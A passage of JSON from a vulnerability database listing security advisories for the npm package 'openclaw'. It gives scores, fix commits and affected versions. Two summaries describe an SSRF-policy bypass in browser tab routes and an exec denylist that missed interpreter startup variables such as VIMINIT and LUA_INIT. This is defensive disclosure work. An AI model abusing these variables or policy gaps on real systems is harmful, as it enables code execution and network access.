mgcp-v6m7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gg9v-mgcp-v6m7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-41386","GHSA-gg9v-mgcp-v6m7"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zpb1-e3g9-vkbh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89719?format=json","vulnerability_id":"VCID-zpte-tgt5-wqcm","summary":"OpenClaw: Browser tabs action select and close routes bypassed SSRF policy\n## Summary\n\nBrowser tabs action select and close routes bypassed SSRF policy.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe browser `/tabs/action` select and close branches could operate on targets without enforcing configured browser SSRF policy, weakening tab-level navigation protections.\n\n## Technical Details\n\nThe fix enforces browser SSRF policy in the select and close tab-action branches.\n\n## Fix\n\nThe issue was fixed in #63332. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `48c0347921b7e9438af0312968fc360ca88023f3`\n- PR: #63332\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @tdjackey for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42439","reference_id":"","reference_type":"","scores":[{"value":"0.00031","scoring_system":"epss","scoring_elements":"0.09559","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11153","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11187","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42439"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/48c03479211799ec3c1305ad69037cea25ba0e1e","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/48c03479211799ec3c1305ad69037cea25ba0e1e"},{"reference_url":"https://github.com/openclaw/openclaw/commit/48c0347921b7e9438af0312968fc360ca88023f3","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T14:03:51Z/"}],"url":"https://github.com/openclaw/openclaw/commit/48c0347921b7e9438af0312968fc360ca88023f3"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63332","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63332"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rj2p-j66c-mgqh","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T14:03:51Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rj2p-j66c-mgqh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42439","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42439"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-ssrf-policy-bypass-in-browser-tabs-action-routes","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T14:03:51Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-ssrf-policy-bypass-in-browser-tabs-action-routes"},{"reference_url":"https://github.com/advisories/GHSA-rj2p-j66c-mgqh","reference_id":"GHSA-rj2p-j66c-mgqh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rj2p-j66c-mgqh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-42439","GHSA-rj2p-j66c-mgqh"],"risk_score":3.9,"exploitability":"0.5","weighted_severity":"7.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zpte-tgt5-wqcm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89586?format=json","vulnerability_id":"VCID-zu4s-jnn3-1kd8","summary":"OpenClaw: Exec environment denylist missed high-risk interpreter startup variables\n## Summary\n\nExec environment denylist missed high-risk interpreter startup variables.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe exec environment policy missed interpreter startup variables such as `VIMINIT`, `EXINIT`, `LUA_INIT`, and `HOSTALIASES`, allowing operator-supplied environment overrides to influence downstream execution or network behavior.\n\n## Technical Details\n\nThe fix expands the host environment security policy denylist to cover these and related high-risk environment variables, with regression coverage.\n\n## Fix\n\nThe issue was fixed in #63277. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `2d126fc62343a7b6895351f96e4e1474bc358140`\n- PR: #63277\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43584","reference_id":"","reference_type":"","scores":[{"value":"0.0012","scoring_system":"epss","scoring_elements":"0.30608","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0012","scoring_system":"epss","scoring_elements":"0.30575","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00139","scoring_system":"epss","scoring_elements":"0.33672","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43584"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2d126fc62343a7b6895351f96e4e1474bc358140","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:02:18Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2d126fc62343a7b6895351f96e4e1474bc358140"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vfp4-8x56-j7c5","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:02:18Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vfp4-8x56-j7c5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43584","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43584"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-insufficient-environment-variable-denylist-in-exec-policy","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:02:18Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-insufficient-environment-variable-denylist-in-exec-policy"},{"reference_url":"https://github.com/advisories/GHSA-vfp4-8x56-j7c5","reference_id":"GHSA-vfp4-8x56-j7c5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vfp4-8x56-j7c5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fn